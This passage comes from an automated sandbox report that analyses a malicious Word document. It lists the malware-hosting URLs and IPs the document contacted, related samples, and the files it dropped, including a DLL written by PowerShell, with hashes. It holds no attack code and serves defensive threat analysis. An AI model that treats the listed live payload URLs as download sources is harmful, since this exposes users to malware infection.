http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://wpsapk.com/wp-admin/v/	100%	Avira URL Cloud	malware
https://shop.elemenslide.comp	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
veterinariadrpopui.com	209.59.139.39	true	true	7%, Virustotal, Browse	unknown
wpsapk.com	172.67.141.14	true	true	1%, Virustotal, Browse	unknown
sofsuite.com	172.67.158.72	true	true	4%, Virustotal, Browse	unknown
khanhhoahomnay.net	210.86.239.69	true	true	6%, Virustotal, Browse	unknown
shop.elemenslide.com	45.130.229.91	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://veterinariadrpopui.com/content/5f18Q/	true	Avira URL Cloud: malware	unknown
http://sofsuite.com/wp-includes/2jm3nIk/	true	Avira URL Cloud: phishing	unknown
http://khanhhoahomnay.net/wordpress/CGMC/	true	Avira URL Cloud: malware	unknown
http://shop.elemenslide.com/wp-content/n/	true	Avira URL Cloud: malware	unknown
http://wpsapk.com/wp-admin/v/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	rundll32.exe, 00000008.00000002.2103265180.0000000001FC0000.00000002.00000001.sdmp	false		high
https://shop.elemenslide.com/wp-content/n/	powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://veterinariadrpopui.com	powershell.exe, 00000005.00000002.2105458162.0000000003AB9000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://investor.msn.com	rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp	false		high
http://www.piriform.com/ccleaneH)	powershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmp	false		high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp	false		high
http://beatlemail.net/picture.php?blogid=0	powershell.exe, 00000005.00000002.2105381598.0000000003A66000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/	powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://www.cloudflare.com/5xx-error-landing	powershell.exe, 00000005.00000002.2105417379.0000000003A8B000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2105458162.0000000003AB9000.00000004.00000001.sdmp	false		high
https://shop.elemenslide.com	powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	rundll32.exe, 00000006.00000002.2105653312.0000000001ED7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101972300.00000000022D7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2103626695.00000000021A7000.00000002.00000001.sdmp, rundll32.exe, 0000000B.00000002.2110270335.0000000001FD7000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	powershell.exe, 00000005.00000002.2099953292.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2103439208.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105096202.0000000002830000.00000002.00000001.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv	powershell.exe, 00000005.00000002.2098871684.00000000002B4000.00000004.00000020.sdmp	false		high
http://shop.elemenslide.com	powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://khanhhoahomnay.net	powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://investor.msn.com/	rundll32.exe, 00000006.00000002.2105175373.0000000001CF0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2101374125.00000000020F0000.00000002.00000001.sdmp	false		high
http://sofsuite.com	powershell.exe, 00000005.00000002.2105417379.0000000003A8B000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://www.cloudflare.com/5xx-error-landing/	powershell.exe, 00000005.00000002.2105381598.0000000003A66000.00000004.00000001.sdmp	false		high
http://wpsapk.com	powershell.exe, 00000005.00000002.2104428008.0000000003732000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://www.%s.comPA	powershell.exe, 00000005.00000002.2099953292.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2103439208.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2105096202.0000000002830000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://shop.elemenslide.comp	powershell.exe, 00000005.00000002.2105524731.0000000003AF7000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
210.86.239.69	unknown	Viet Nam	24173	NETNAM-AS-APNetnamCompanyVN	true
209.59.139.39	unknown	United States	32244	LIQUIDWEBUS	true
172.67.141.14	unknown	United States	13335	CLOUDFLARENETUS	true
45.130.229.91	unknown	Germany	47583	AS-HOSTINGERLT	true
5.2.136.90	unknown	Romania	8708	RCS-RDS73-75DrStaicoviciRO	true
172.67.158.72	unknown	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	337092
Start date:	07.01.2021
Start time:	18:43:35
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	MAIL-0573188.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@22/8@6/6
EGA Information:	Failed
HDC Information:	Successful, ratio: 84.3% (good quality ratio 80.8%) Quality average: 74.4% Quality standard deviation: 25.6%
HCA Information:	Successful, ratio: 91% Number of executed functions: 121 Number of non-executed functions: 90
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
18:44:38	API Interceptor	1x Sleep call for process: msg.exe modified
18:44:39	API Interceptor	67x Sleep call for process: powershell.exe modified
18:44:46	API Interceptor	883x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
210.86.239.69	dat_513543.doc	Get hash	malicious	Browse	khanhhoahomnay.net/wordpress/CGMC/
	DATA-480841.doc	Get hash	malicious	Browse	khanhhoahomnay.net/wordpress/CGMC/
	Documenten_9274874 8574977265.doc	Get hash	malicious	Browse	khanhhoahomnay.net/wordpress/CGMC/
	pack-91089 416755919.doc	Get hash	malicious	Browse	khanhhoahomnay.net/wordpress/CGMC/
209.59.139.39	dat_513543.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	DATA-480841.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	Documenten_9274874 8574977265.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	pack-91089 416755919.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	Adjunto.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	NQN0244_012021.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	4560 2021 UE_9893.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	Scan-0767672.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	Documento-2021.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	info_39534.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	http://btxtfnereq4mf3x3q1eq1sdudvhhiurr.www4.me	Get hash	malicious	Browse	cirugiaesteticamexico.medicainspira.com/wordpress/wp-content/upgrade/i/googlephotos/album/
172.67.141.14	Documento-2021.doc	Get hash	malicious	Browse	wpsapk.com/wp-admin/v/
172.67.141.14	info_39534.doc	Get hash	malicious	Browse	wpsapk.com/wp-admin/v/
45.130.229.91	Adjunto.doc	Get hash	malicious	Browse	shop.elemenslide.com/wp-content/n/
	NQN0244_012021.doc	Get hash	malicious	Browse	shop.elemenslide.com/wp-content/n/
	4560 2021 UE_9893.doc	Get hash	malicious	Browse	shop.elemenslide.com/wp-content/n/
	Scan-0767672.doc	Get hash	malicious	Browse	shop.elemenslide.com/wp-content/n/
	Documento-2021.doc	Get hash	malicious	Browse	shop.elemenslide.com/wp-content/n/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
wpsapk.com	dat_513543.doc	Get hash	malicious	Browse	104.18.61.59
	DATA-480841.doc	Get hash	malicious	Browse	104.18.61.59
	Documenten_9274874 8574977265.doc	Get hash	malicious	Browse	104.18.61.59
	pack-91089 416755919.doc	Get hash	malicious	Browse	104.18.61.59
	Adjunto.doc	Get hash	malicious	Browse	104.18.60.59
	NQN0244_012021.doc	Get hash	malicious	Browse	104.18.60.59
	4560 2021 UE_9893.doc	Get hash	malicious	Browse	104.18.61.59
	Scan-0767672.doc	Get hash	malicious	Browse	104.18.60.59
	Documento-2021.doc	Get hash	malicious	Browse	172.67.141.14
	info_39534.doc	Get hash	malicious	Browse	172.67.141.14
veterinariadrpopui.com	dat_513543.doc	Get hash	malicious	Browse	209.59.139.39
	DATA-480841.doc	Get hash	malicious	Browse	209.59.139.39
	Documenten_9274874 8574977265.doc	Get hash	malicious	Browse	209.59.139.39
	pack-91089 416755919.doc	Get hash	malicious	Browse	209.59.139.39
	Adjunto.doc	Get hash	malicious	Browse	209.59.139.39
	NQN0244_012021.doc	Get hash	malicious	Browse	209.59.139.39
	4560 2021 UE_9893.doc	Get hash	malicious	Browse	209.59.139.39
	Scan-0767672.doc	Get hash	malicious	Browse	209.59.139.39
	Documento-2021.doc	Get hash	malicious	Browse	209.59.139.39
	info_39534.doc	Get hash	malicious	Browse	209.59.139.39
sofsuite.com	dat_513543.doc	Get hash	malicious	Browse	104.27.144.251
	DATA-480841.doc	Get hash	malicious	Browse	104.27.145.251
	Documenten_9274874 8574977265.doc	Get hash	malicious	Browse	104.27.144.251
	pack-91089 416755919.doc	Get hash	malicious	Browse	104.27.145.251
	Adjunto.doc	Get hash	malicious	Browse	104.27.144.251
	NQN0244_012021.doc	Get hash	malicious	Browse	104.27.144.251
	4560 2021 UE_9893.doc	Get hash	malicious	Browse	104.27.145.251
	Scan-0767672.doc	Get hash	malicious	Browse	104.27.144.251
	Documento-2021.doc	Get hash	malicious	Browse	104.27.145.251
	info_39534.doc	Get hash	malicious	Browse	172.67.158.72
shop.elemenslide.com	Adjunto.doc	Get hash	malicious	Browse	45.130.229.91
	NQN0244_012021.doc	Get hash	malicious	Browse	45.130.229.91
	4560 2021 UE_9893.doc	Get hash	malicious	Browse	45.130.229.91
	Scan-0767672.doc	Get hash	malicious	Browse	45.130.229.91
	Documento-2021.doc	Get hash	malicious	Browse	45.130.229.91
khanhhoahomnay.net	dat_513543.doc	Get hash	malicious	Browse	210.86.239.69
	DATA-480841.doc	Get hash	malicious	Browse	210.86.239.69
	Documenten_9274874 8574977265.doc	Get hash	malicious	Browse	210.86.239.69
	pack-91089 416755919.doc	Get hash	malicious	Browse	210.86.239.69

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	DSj7ak0N6I.exe	Get hash	malicious	Browse	104.28.5.151
	https://wqi69130.mfs.gg/099mmYl	Get hash	malicious	Browse	172.67.74.85
	https://lakewooderie.umcchurches.org/verify#Sugar@saccounty.net	Get hash	malicious	Browse	104.16.19.94
	https://web.tresorit.com/l/JG7xl#7YqXRnhV6spRT3ekJskNaw	Get hash	malicious	Browse	104.18.70.113
	https://zxcew43nrgjvfejcnwrtjnvfdcsxe3rfc.s3.amazonaws.com/eudjscndfjhvndcsjfergvdcsce34redc.html	Get hash	malicious	Browse	104.16.19.94
	https://bit.ly/2Jjog0H	Get hash	malicious	Browse	172.67.72.46
	Inrialpes-letter.html	Get hash	malicious	Browse	104.16.19.94
	https://webmail-4fd4rvt.web.app/?emailtoken=jmahler@vocera.com&domain=vocera.com	Get hash	malicious	Browse	162.159.137.81
	order no. 3643.exe	Get hash	malicious	Browse	23.227.38.74
	JI35907_2020.doc	Get hash	malicious	Browse	172.67.215.117
	http://46.101.152.151/?email=michael.little@austalusa.com	Get hash	malicious	Browse	104.16.19.94
	Order.exe	Get hash	malicious	Browse	23.227.38.74
	http://search.hwatchtvnow.co	Get hash	malicious	Browse	104.18.225.52
	info.doc	Get hash	malicious	Browse	104.27.163.61
	http://keb67683.mfs.gg/Ohz4uhj	Get hash	malicious	Browse	104.26.7.10
	LUJZShZCgN.exe	Get hash	malicious	Browse	172.67.201.126
	https://bit.ly/3hDDoTm	Get hash	malicious	Browse	104.16.19.94
	https://moorparklancssch-my.sharepoint.com/:o:/g/personal/16willcocks_pupils_moorpark_mp/EpuojDvAqLNHlYVejf5zx0kBqAdkUjR2VgNWcoUhvcauDg?e=Th0p8a	Get hash	malicious	Browse	104.18.29.243
	3AD78RVleO.exe	Get hash	malicious	Browse	172.67.188.154
	https://bit.ly/3ba3hZS	Get hash	malicious	Browse	104.16.18.94
NETNAM-AS-APNetnamCompanyVN	dat_513543.doc	Get hash	malicious	Browse	210.86.239.69
	DATA-480841.doc	Get hash	malicious	Browse	210.86.239.69
	Documenten_9274874 8574977265.doc	Get hash	malicious	Browse	210.86.239.69
	pack-91089 416755919.doc	Get hash	malicious	Browse	210.86.239.69
LIQUIDWEBUS	JI35907_2020.doc	Get hash	malicious	Browse	67.225.191.31
	dat_513543.doc	Get hash	malicious	Browse	209.59.139.39
	https://encrypt.idnmazate.org	Get hash	malicious	Browse	67.225.177.41
	DATA-480841.doc	Get hash	malicious	Browse	209.59.139.39
	Documenten_9274874 8574977265.doc	Get hash	malicious	Browse	209.59.139.39
	pack-91089 416755919.doc	Get hash	malicious	Browse	209.59.139.39
	https://securemail.bridgepointeffect.com/	Get hash	malicious	Browse	69.167.167.26
	Adjunto.doc	Get hash	malicious	Browse	209.59.139.39
	NQN0244_012021.doc	Get hash	malicious	Browse	209.59.139.39
	4560 2021 UE_9893.doc	Get hash	malicious	Browse	209.59.139.39
	Scan-0767672.doc	Get hash	malicious	Browse	209.59.139.39
	Documento-2021.doc	Get hash	malicious	Browse	209.59.139.39
	info_39534.doc	Get hash	malicious	Browse	209.59.139.39
	https://encrypt.idnmazate.org/	Get hash	malicious	Browse	67.225.177.41
	Nuevo pedido.exe	Get hash	malicious	Browse	209.188.81.142
	https://6354mortgagestammp.com/	Get hash	malicious	Browse	69.16.199.206
	rib.exe	Get hash	malicious	Browse	72.52.175.20
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fsecuremail.danchihosassociates.com&c=E,1,HOuENPlSucTdSUxKwjhrlo_5dPC7J6R1N-Gq03z50mu0n-SbGg9k6UcvRdnb2hWVC0JKp04hBPt2pBkJTi_IhWBa5JSs0U_QUfg3Hl_nTWTxJyTIR8N3&typo=1	Get hash	malicious	Browse	67.225.158.30
	messaggio 2912.doc	Get hash	malicious	Browse	67.227.152.97
	8415051-122020.doc	Get hash	malicious	Browse	67.227.152.97
AS-HOSTINGERLT	Inrialpes-letter.html	Get hash	malicious	Browse	185.224.138.98
	order no. 3643.exe	Get hash	malicious	Browse	31.170.161.33
	SKM_C258201001130020005057.exe	Get hash	malicious	Browse	31.170.166.165
	bing.dll	Get hash	malicious	Browse	45.84.204.148
	Inquiry-RFQ93847849-pdf.exe	Get hash	malicious	Browse	193.168.194.5
	invoice-ID711675345593.vbs	Get hash	malicious	Browse	141.136.39.142
	Adjunto.doc	Get hash	malicious	Browse	45.130.229.91
	NQN0244_012021.doc	Get hash	malicious	Browse	45.130.229.91
	4560 2021 UE_9893.doc	Get hash	malicious	Browse	45.130.229.91
	Scan-0767672.doc	Get hash	malicious	Browse	45.130.229.91
	Documento-2021.doc	Get hash	malicious	Browse	45.130.229.91
	SecuriteInfo.com.Variant.Razy.820883.21352.exe	Get hash	malicious	Browse	193.168.194.5
	Rfq 214871_TAWI Catalog.exe	Get hash	malicious	Browse	194.59.164.91
	TN22020000560175.exe	Get hash	malicious	Browse	194.59.164.34
	wDMBDrN663.exe	Get hash	malicious	Browse	31.220.110.116
	ORDER 172IKL0153094.exe	Get hash	malicious	Browse	31.170.161.33
	SecuriteInfo.com.VB.Heur.EmoDldr.32.51B75357.Gen.18944.doc	Get hash	malicious	Browse	185.224.137.23
	KX Trainer V2.exe	Get hash	malicious	Browse	194.5.156.24
	https://j.mp/3h2fG2Z	Get hash	malicious	Browse	156.67.222.153
	JgHsz8Vvc8.exe	Get hash	malicious	Browse	213.190.6.55

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D1917291-551E-40AF-9919-E039C2A6E74E}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbWwWl:sZ
MD5:	3B7B4F5326139F48EFA0AAE509E2FE58
SHA1:	209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
SHA-256:	D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
SHA-512:	C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
Malicious:	false
Preview:	........................................user.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\MAIL-0573188.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Fri Jan 8 01:44:34 2021, length=170496, window=hide
Category:	dropped
Size (bytes):	2048
Entropy (8bit):	4.530199404833512
Encrypted:	false
SSDEEP:	24:8i/XTwz6IknLG6WeD6fDv3q8dM7dD2i/XTwz6IknLG6WeD6fDv3q8dM7dV:8i/XT3IkL408Qh2i/XT3IkL408Q/
MD5:	4DF39A955577FBDA718F9D744D03D389
SHA1:	1F96596530013454CB944E4693228373D9BF8504
SHA-256:	970267C26980A032F6BB5CB8D5FD612C80629BAE750CEF7098FA4C11B04C28F0
SHA-512:	B4A840E49540EFAD08E21352CCC5F3F202099BBA18435B18893A17D7ACB27D1A3D2EE34CE5FC3D95E61212C64FB84D3816CC9757987907033F0C4851399D53C2
Malicious:	false
Preview:	L..................F.... ...[._..{..[._..{.....2h................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....j.2.....(R.. .MAIL-0~1.DOC..N.......Q.y.Q.y...8.....................M.A.I.L.-.0.5.7.3.1.8.8...d.o.c.......z...............-...8...[............?J......C:\Users\..#...................\\910646\Users.user\Desktop\MAIL-0573188.doc.'.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.M.A.I.L.-.0.5.7.3.1.8.8...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......910646..........D_....3N...W...9F.C...........[D_....3N...W

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	74
Entropy (8bit):	4.3607066630908955
Encrypted:	false
SSDEEP:	3:M15spzAXCw/AXCmX15spzAXCv:MMpEKUpEc
MD5:	76E48FC73FE7372631FFFC13033A5895
SHA1:	3F72CAC7C77D9A1647FE86E6EDA4FE8914349C28
SHA-256:	ADE4E1003850612E9367818208AE5BD93DADFAFE4E7A5DFBA12969AB807BE60C
SHA-512:	A50068261A09A9A220627DCA913E255B1CF7DF275DC884D8B898A91E66C28D9E781DF4A009CD82364D3734852FFE390BCC865824B65EBAB66B2184A393F3763C
Malicious:	false
Preview:	[doc]..MAIL-0573188.LNK=0..MAIL-0573188.LNK=0..[doc]..MAIL-0573188.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
MD5:	6AF5EAEBE6C935D9A5422D99EEE6BEF0
SHA1:	6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
SHA-256:	CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
SHA-512:	B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\20G6ZLCGULCSH5TY8WGA.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8016
Entropy (8bit):	3.5848677611288466
Encrypted:	false
SSDEEP:	96:chQCsMq2yqvsqvJCwomz8hQCsMq2yqvsEHyqvJCworczkKY2PHFf8R/MlUVoIu:cykomz8ywHnorczkOf8R4Iu
MD5:	975DDE3BEB992D275DFD4DD1F527950A
SHA1:	14DCBA69A937054538AFBB71BEC3B98CD9D80FB8
SHA-256:	254E0DC72C97BCF7AC365492C16C07DF602BE3D408DD827276282F50C4A0EFB4
SHA-512:	100E34A41FF78016C4728DBB19B5D5980C5B9619CCFE145F06A0D4D17C33AC4766BF3CFB8483686163AFCBD532DB0639A31E22D8C1A9D7FC355C3E97B4FFE784
Malicious:	false
Preview:	...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J\|v. MICROS~1..@.......:..~J\|v...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;..........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf....................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr....................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,....=....................W.i.n.d.o.w.s.

C:\Users\user\Desktop\~$IL-0573188.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyzALORwObGUXKbylln:vdsCkWtJLObyvb+l
MD5:	6AF5EAEBE6C935D9A5422D99EEE6BEF0
SHA1:	6FE25A65D5CC0D4F989A1D79DF5CE1D225D790EC
SHA-256:	CE916A38A653231ED84153C323027AC4A0695E0A7FB7CC042385C96FA6CB4719
SHA-512:	B2F51A8375748037E709D75C038B48C69E0F02D2CF772FF355D7203EE885B5DB9D1E15DA2EDB1C1E2156A092F315EB9C069B654AF39B7F4ACD3EFEFF1F8CAEB0
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........^...............^.............P.^..............^.....z.........^.....x...

C:\Users\user\Nspzvsg\Sj_dwgs\R31N.dll Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	196317
Entropy (8bit):	7.475350289212884
Encrypted:	false
SSDEEP:	3072:CbwbpDnn9FdrNyVBYF0n3ajFq4weCp2S2MJdhzybMO8dSySA:Cbsl9FdaBYF0nVp2MJHybR8dS9
MD5:	3771989E5967540F6AABFD211CCFA9F1
SHA1:	8C4B4D489EC21B0F8F7613E767E248F511257F61
SHA-256:	F3A6E22AF9D7C859F8CACC9AE43155CE6EDA005579FC7C8F195FB91D4C0D3B22
SHA-512:	9DD2011907FE42D47AD7867D405EB18FD4906B63E600DEEC36C4351DBA363E88915638B74FB2172AC7F7DB90687BEB36358A13A0365F0DFF8F8F93C66A214253
Malicious:	false
